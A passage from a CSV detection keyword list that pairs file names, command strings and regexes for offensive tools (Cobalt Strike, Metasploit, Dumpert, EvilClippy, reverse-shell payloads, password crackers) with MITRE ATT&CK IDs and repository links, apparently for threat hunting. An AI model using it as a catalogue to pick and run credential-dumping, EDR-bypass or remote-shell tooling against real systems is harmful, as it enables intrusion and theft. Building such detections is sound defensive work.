T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openSpearPhishDialog*",".{0,1000}openSpearPhishDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openssl_heartbleed.rb*",".{0,1000}openssl_heartbleed\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*openssl2john.py*",".{0,1000}openssl2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*OpenVAS*",".{0,1000}OpenVAS.{0,1000}","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.openvas.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*OpenVPN/SOCKS extension initialized.*",".{0,1000}OpenVPN\/SOCKS\sextension\sinitialized\..{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*openwall.John.appdata.xml*",".{0,1000}openwall\.John\.appdata\.xml.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*openwall.John.desktop*",".{0,1000}openwall\.John\.desktop.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*openwall/john*",".{0,1000}openwall\/john.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*openWindowsExecutableStage*",".{0,1000}openWindowsExecutableStage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Operative Framework*",".{0,1000}Operative\sFramework.{0,1000}","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Frameworks","https://github.com/graniet/operative-framework","1","0","N/A","N/A","7","663","171","2023-12-13T22:11:30Z","2017-01-03T08:38:59Z" "*ophcrack*",".{0,1000}ophcrack.{0,1000}","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*o-printernightmare.ps1*",".{0,1000}o\-printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*options.bruteforced_protocol*",".{0,1000}options\.bruteforced_protocol.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*optiv/Ivy.git*",".{0,1000}optiv\/Ivy\.git.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*optiv/Registry-Recon*",".{0,1000}optiv\/Registry\-Recon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","317","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" "*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*oracle_default_hashes.txt*",".{0,1000}oracle_default_hashes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*oracle_default_passwords.csv*",".{0,1000}oracle_default_passwords\.csv.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Orange-Cyberdefense/arsenal*",".{0,1000}Orange\-Cyberdefense\/arsenal.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Orange-Cyberdefense/KeePwn*",".{0,1000}Orange\-Cyberdefense\/KeePwn.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*Orange-Cyberdefense/LinikatzV2*",".{0,1000}Orange\-Cyberdefense\/LinikatzV2.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*orbitaldump.py*",".{0,1000}orbitaldump\.py.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*orbitaldump/orbitaldump*",".{0,1000}orbitaldump\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*OrderFromC2 = ReadEmail()*",".{0,1000}OrderFromC2\s\=\sReadEmail\(\).{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*OS-Command-Injection-Unix-Payloads.*",".{0,1000}OS\-Command\-Injection\-Unix\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*OS-Command-Injection-Windows-Payloads.*",".{0,1000}OS\-Command\-Injection\-Windows\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*OSCP-Archives*",".{0,1000}OSCP\-Archives.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","7","610","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" "*osmedeus cloud*",".{0,1000}osmedeus\scloud.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus health*",".{0,1000}osmedeus\shealth.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus provider*",".{0,1000}osmedeus\sprovider.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus scan*",".{0,1000}osmedeus\sscan.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus utils*",".{0,1000}osmedeus\sutils.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osx/dump_keychain*",".{0,1000}osx\/dump_keychain.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*osx/x64/meterpreter/reverse_tcp*",".{0,1000}osx\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*osx/x64/meterpreter_reverse_tcp*",".{0,1000}osx\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*osx/x64/shell_reverse_tcp*",".{0,1000}osx\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*osx_gatekeeper_bypass.*",".{0,1000}osx_gatekeeper_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*OtterHacker/SetProcessInjection*",".{0,1000}OtterHacker\/SetProcessInjection.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*ourtn-ftshell-upcommand*",".{0,1000}ourtn\-ftshell\-upcommand.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*",".{0,1000}\-out.{0,1000}\.exe\s\-r\:.{0,1000}System\.Drawing\.dll.{0,1000}System\.Management\.Automation.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*--out=nimcrypt*",".{0,1000}\-\-out\=nimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*Out-CompressedDLL.ps1*",".{0,1000}Out\-CompressedDLL\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Out-DnsTxt.ps1*",".{0,1000}Out\-DnsTxt\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*outflank_stage1.implant*",".{0,1000}outflank_stage1\.implant.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Outflank-Dumpert*",".{0,1000}Outflank\-Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Outflank-Dumpert.*",".{0,1000}Outflank\-Dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*outflanknl/Dumpert*",".{0,1000}outflanknl\/Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*outflanknl/EvilClippy*",".{0,1000}outflanknl\/EvilClippy.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*outflanknl/Net-GPPPassword*",".{0,1000}outflanknl\/Net\-GPPPassword.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*outflanknl/NetshHelperBeacon*",".{0,1000}outflanknl\/NetshHelperBeacon.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense 